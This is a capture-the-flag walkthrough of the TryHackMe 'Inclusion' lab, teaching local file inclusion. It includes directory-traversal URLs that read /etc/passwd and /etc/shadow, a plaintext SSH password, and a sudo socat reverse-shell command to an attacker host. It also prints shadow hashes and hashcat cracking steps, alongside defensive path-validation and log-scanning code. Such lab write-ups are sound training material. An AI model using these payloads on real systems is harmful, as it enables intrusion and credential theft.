TryHackMe Inclusion

Today we are going to tackle Inclusion.  This is supposed to be a beginner level challenge teaching local file inclusion. 

Local File Inclusion allows an attacker to use files on the local machine to execute code or disclose information.

First let’s start off by scanning the machine with our favorite port scanner, Nmap.

nmap -p- -T4 --reason <TargetIP>

-p- scan all the ports

-T4 use the second fastest speed

--reason Nmap will tell you why it thinks a port is open or closed.

nmap -p 22,80 -sV -T4 --reason <TargetIP>

Looks like we have a web server running, so let’s check it out.  Clicking the View details button under Hacking this world shows us how the website displays the articles.

It looks like you need to pass a parameter called name in order to view an article.  What if we try to pass it a binary we can run through directory traversal?  We need to move up several directories in order to reach the root and then move into the bin directory.  You don’t need to know exactly how many directories to move up, because you can’t go any higher than root (/).  So if we put 100 ../’s in the URL we would still just be at the root directory.

http://<TargetIP>/article?name=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../bin/ls%20/home/

I added the %20 because this is the URL encoding for a space.  Sadly this just gave us an internal server error.
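To show why the long run of ../’s above still resolves cleanly to the root directory, and what the article handler should have done instead, here is an added example (my code, not the challenge’s Flask app). The article directory path is assumed; the real app’s layout is not on the page.

```python
import os
from typing import Optional

# Assumed location of the article files; the real app's directory is not on the page.
ARTICLE_DIR = "/var/www/articles"


def vulnerable_article_path(name: str) -> str:
    """Resolve the path the way an LFI-prone handler does: the user-controlled
    ``name`` is joined onto the base directory with no validation at all.
    normpath() collapses every ``..``, and once the path reaches ``/`` any
    extra ``..`` segments are simply discarded, which is why a long run of
    ``../`` still lands exactly at the root directory."""
    return os.path.normpath(os.path.join(ARTICLE_DIR, name))


def safe_article_path(name: str) -> Optional[str]:
    """Resolve the same path but refuse anything that escapes ARTICLE_DIR.

    Three things are checked:
      1. an absolute ``name`` (os.path.join would discard the base directory),
      2. a NUL byte (the filesystem layer rejects it anyway, but fail early),
      3. the normalised path still being inside ARTICLE_DIR (commonpath is
         component-aware, so ``../articles-backup`` is caught too).
    Returns None for a rejected name."""
    if not name or name.startswith("/") or "\0" in name:
        return None
    candidate = os.path.normpath(os.path.join(ARTICLE_DIR, name))
    if os.path.commonpath([ARTICLE_DIR, candidate]) != ARTICLE_DIR:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample inputs: a benign name, the traversal from the page,
    # an excessive one to show the extra ../ segments change nothing, and an
    # absolute path that os.path.join would otherwise accept silently.
    for n in ["hacking-this-world", "../" * 7 + "etc/passwd",
              "../" * 100 + "etc/shadow", "/etc/shadow"]:
        print(f"{n[:40]!r:45} vuln={vulnerable_article_path(n)!r:20} "
              f"safe={safe_article_path(n)!r}")
```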

Maybe we can access some sensitive files such as /etc/passwd, where accounts and shell configurations are stored, and /etc/shadow, where password hashes are stored.  Typically /etc/shadow is only readable by root and the shadow group, but there can be misconfigurations.

http://<TargetIP>/article?name=../../../../../../../etc/passwd

This file is interesting, because falconfeast has a comment in the file displaying a possible plaintext password.  First let’s see if the web server is misconfigured, allowing us to read the /etc/shadow file.

http://<TargetIP>/article?name=../../../../../../../etc/shadow

In fact we are able to read the /etc/shadow file.  This is most likely because the web server is running as the root user, but we can investigate that after we hack the machine.
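From the defensive side, the requests above leave an obvious trail in the web server’s access log. This added example (mine, not part of the original write-up) scans constructed log lines in combined log format for traversal or absolute-path values in any query parameter, decoding percent-encoding repeatedly so double-encoded ../ cannot slip past.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed sample log lines (not taken from the page); the third and fourth
# carry single- and double-percent-encoded traversal respectively.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /article?name=hacking-this-world HTTP/1.1" 200 2048
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /article?name=../../../../../../../etc/passwd HTTP/1.1" 200 1523
10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /article?name=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 990
10.0.0.9 - - [01/Jan/2024:10:00:12 +0000] "GET /article?name=%252e%252e%252fetc%252fpasswd HTTP/1.1" 500 300
10.0.0.5 - - [01/Jan/2024:10:00:20 +0000] "GET /static/style.css HTTP/1.1" 200 800
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded) so that
    double-encoded sequences such as %252e%252e%252f are unmasked."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def traversal_in_request(target: str) -> bool:
    """True if any query parameter, once decoded, contains a .. path segment
    or is an absolute path, the pattern the article?name= parameter abused."""
    parsed = urlsplit(target)
    for values in parse_qs(parsed.query, keep_blank_values=True).values():
        for v in values:
            d = fully_decode(v).replace("\\", "/")
            if re.search(r"(^|/)\.\.(/|$)", d) or d.startswith("/"):
                return True
    return False


def find_traversal_attempts(log_text: str):
    """Return (ip, status, target) for every request that looks like traversal.
    A 200 on such a request is the one to escalate: the file was served."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m and traversal_in_request(m["target"]):
            hits.append((m["ip"], int(m["status"]), m["target"]))
    return hits
```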

Back to the falconfeast user, let’s try to login with the password rootpassword.

ssh falconfeast@<TargetIP>

Enter rootpassword

Wow, this gave us SSH access as falconfeast.  This is a huge misconfiguration.  If that comment weren’t there, we may have had to crack the password.  It is using SHA256, which is a stronger hashing algorithm, so it may have been more difficult.  We can try to crack the passwords at the end.

Great, we can grab the user flag and start working on privilege escalation.

The first place I always look for privilege escalation is checking what commands, if any, a user can run as root.  Using https://gtfobins.github.io/, this can quickly lead to an easy win.

sudo -l

Well, we can run socat as root without a password!  All we need to do is set up a netcat listener.  Socat is a program similar to netcat that allows connections over TCP or UDP ports.

Setting up a listener:

nc -nvlp 1337

n – do not resolve hostnames via DNS

v – verbose.  If you want the messages to be more verbose you can add more v’s.

l – listen for an incoming connection

p – the port you want to listen on.

Now we need to initiate a connection from the target machine to our netcat listener using socat.  https://gtfobins.github.io/gtfobins/socat/

sudo /usr/bin/socat tcp-connect:<AttackerIP>:1337 exec:/bin/bash,pty,stderr,setsid,sigint,sane

Here I changed from a normal shell over to a bash shell.  I just like a bash shell better.

Just like that we have rooted this machine!  This is why you should always be careful when allowing a low-privileged user to run commands as root; you never know when someone may be able to escalate privileges!

cat /home/falconfeast/user.txt

cat /root.txt

Now let’s crack those passwords.

root:$6$mFbzBSI/$c80cICObesNyF9XxbF6h6p6U2682MfG5gxJ5KtSLrGI8766/etwzBvppTuug6aLoltiSmeqdIaEUg6f/NLYDn0

falconfeast:$6$dYJsdbeD$rlYGlx24kUUcSHTc0dMutxEesIAUA3d8nQeTt6FblVffELe3FxLE3gOID5nLxpHoycQ9mfSC.TNxLxet9BN5c/

These look like SHA-512 based on my prior experience, but we can confirm using hashid.  This tool will tell you what modes to use for John the Ripper and hashcat, both password cracking tools.  What gives it away that it’s SHA-512 crypt is the $6$ at the front.

Store the two hashes in a text file called Inclusion.txt, but remove the two user names.

hashcat.exe -m 1800 -a 0 Inclusion.txt rockyou.txt -O

We were able to crack the root hash in just 59 seconds.  The laptop I am running this on is from 2015 with an older graphics card in it, so it’s nothing special.

Surprisingly the password for falconfeast wasn’t cracking.  I thought if 123hacker123 cracked, so would rootpassword, but it seems not to be the case.  You are able to su to root using the password 123hacker123.

Back to whether the web server was running as root.  Using ps aux we can look for the process that is running the web server.  We find a Flask app running on port 80, so we can assume this is the web server and it is indeed running as root.

I hope you enjoyed this quick run through for Local File Inclusion, until next time keep hacking!